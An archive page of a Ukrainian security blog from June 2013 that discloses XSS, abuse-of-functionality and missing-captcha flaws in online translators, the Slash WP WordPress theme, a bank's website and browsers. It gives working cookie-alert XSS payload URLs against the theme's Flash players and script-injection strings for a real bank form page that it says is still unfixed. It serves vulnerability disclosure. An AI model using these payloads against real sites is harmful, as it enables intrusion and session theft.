Архів для категорії 'Уразливості'

Уразливості на www.translate.ru

23:55 22.06.2013

Вчора, 21.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://www.translate.ru. Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=http://google.com

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості на www.online-translator.com

17:21 22.06.2013

Вчора, 21.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://www.online-translator.com. Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=http://google.com

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості в плагінах для WordPress №108

23:52 21.06.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Spider Event Calendar, WordPress User Role Editor та WordPress Themes Book. Для котрих з’явилися експлоіти. Spider Event Calendar - це плагін для створення календаря, WordPress User Role Editor - це плагін для редагування ролей користувачів WP, WordPress Themes Book - це розробники тем для движка (зокрема наводиться уразливість в темі Flash Gamer).

  • Spider Event Calendar 1.3.0 Cross Site Scripting / Path Disclosure / SQL Injection (деталі)
  • WordPress User Role Editor 3.12 Cross Site Request Forgery (деталі)
  • WordPress Themes Book Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на freetranslation.com

23:57 20.06.2013

У червні, 19.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://freetranslation.com (зокрема на піддомені fets3.freetranslation.com). Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://fets3.freetranslation.com/?Url=http://google.com&Language=English%2FSpanish&Sequence=core

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Уразливості в темі Slash WP для WordPress

17:24 20.06.2013

11.04.2013

У січні, 31.01.2013, я знайшов Full path disclosure, Cross-Site Scripting та Content Spoofing уразливості в темі Slash WP для WordPress. Про що найближчим часом повідомлю розробникам шаблону.

Раніше я вже писав про уразливості в темі Chocolate WP для WordPress від цих розробників.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.06.2013

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD в index.php та інших php-файлах в папці плагіна та підпапках.

Cross-Site Scripting (WASC-08):

В темі використовується jPlayer 2.1.0 та JW Player 5.8.2011, про уразливості в яких я вже писав.

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

На деяких сайтах з цією темою флешка JW Player є, на інших немає. Згідно з описом теми, JW Player підтримується темою, але не входить в стандартну поставку (лише jPlayer). Але його можна встановити окремо, що і роблять деякі власники сайтів.

Content Spoofing (WASC-12):

Про Content Spoofing уразливості та про інші XSS уразливості в JW Player та в jPlayer, ми можете прочитати у відповідних записах.

Уразливі всі версії теми Slash WP для WordPress.

Добірка уразливостей

17:29 18.06.2013

В даній добірці уразливості в веб додатках:

  • Vulnerability in Cisco Prime LAN Management Solution (LMS) (деталі)
  • Trimble Infrastructure GNSS Series Receivers Cross Site Scripting (XSS) vulnerability (деталі)
  • DoS vulnerability in Squid (деталі)
  • HP XP P9000 Command View Advanced Edition, Remote Denial of Service (DoS) (деталі)
  • Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities (деталі)

DoS в Mozilla Firefox та Internet Explorer

23:57 14.06.2013

Раніше я писав про DoS уразливість в браузері Firefox 14.0.1 знайдену Jean Pascal Pereira. І от дослідивши 07.04.2013 цю уразливість, я виявив, що багато інших браузерів також уразливі до даної атаки.

Тоді я виявив Denial of Service уразливості в Mozilla Firefox та Microsoft Internet Explorer. Вони відноситься до типу вибиваючих DoS та блокуючих DoS.

Атака відбувається через нескінченну рекурсію. Що призводить до споживання пам’яті комп’ютера.

DoS:

Моя версія експлоіта для різних браузерів.

Mozilla Firefox & IE DoS Exploit.html

Вибивання працює в Firefox 10.0.7 ESR та 15.0.1, але не працює в 3.0.19 та попередіх версіях. В Firefox 3.5.19 і 3.6.28, IE7 та IE8 лише підвисання.

Уразливі Mozilla Firefox 3.5.19, 3.6.28, 10.0.7 ESR, 15.0.1, Internet Explorer 7 (7.00.5730.13) та Internet Explorer 8 (8.00.6001.18702). А також повинні бути уразливими попередні версії даних браузерів і потенційно більш нові версії Firefox та Internet Explorer.

Уразливості в плагінах для WordPress №107

22:46 14.06.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах ProPlayer, Flagallery-Skins та Spider Catalog. Для котрих з’явилися експлоіти. ProPlayer - це медіа плеєр, Flagallery-Skins - це плагін з шаблонами галерей, Spider Catalog - це плагін для створення каталогу.

  • WordPress ProPlayer Plugin SQL Injection (деталі)
  • Wordpress Flagallery-Skins SQL Injection (деталі)
  • Spider Catalog 1.4.6 Cross Site Scripting / Path Disclosure / SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:27 14.06.2013

В даній добірці уразливості в веб додатках:

  • Nero MediaHome Multiple Remote DoS Vulnerabilities (деталі)
  • Webrevelation SQL Injection Vulnerability (деталі)
  • VMware View Connection Server Directory Traversal (деталі)
  • Facebook for Android - Information Diclosure Vulnerability (деталі)
  • VMware security updates for vCSA and ESXi (деталі)
  • Cisco Linksys Remote Preauth 0day Root Exploit (деталі)
  • HP Serviceguard on Linux, Remote Denial of Service (DoS) (деталі)
  • Axway Secure Messenger Username Disclosure (деталі)
  • DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/) (деталі)
  • DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) (деталі)

Численні уразливості на kredobank.com.ua

23:51 13.06.2013

21.02.2013

У липні, 14.06.2012, я знайшов численні уразливості на http://kredobank.com.ua - сайті банка КРЕДОБАНК. Цього разу це Cross-Site Scripting та Insufficient Anti-automation дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kredobank.com.ua. Тоді дірки були в системі онлайн-банкінгу, а зараз на основному сайті банка.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.06.2013

XSS:

POST запит на сторінці http://kredobank.com.ua/executionsale_form.html
"><script>alert(document.cookie)</script>В параметрах: organization, contact, telefons, address, email, activity, stuff_type, stuff_subtype, placement.
</textarea><script>alert(document.cookie)</script>В параметрі information.

Insufficient Anti-automation:

На сторінці http://kredobank.com.ua/executionsale_form.html немає захисту від автоматизованих запитів (капчі).

Дані уразливості досі не виправлені.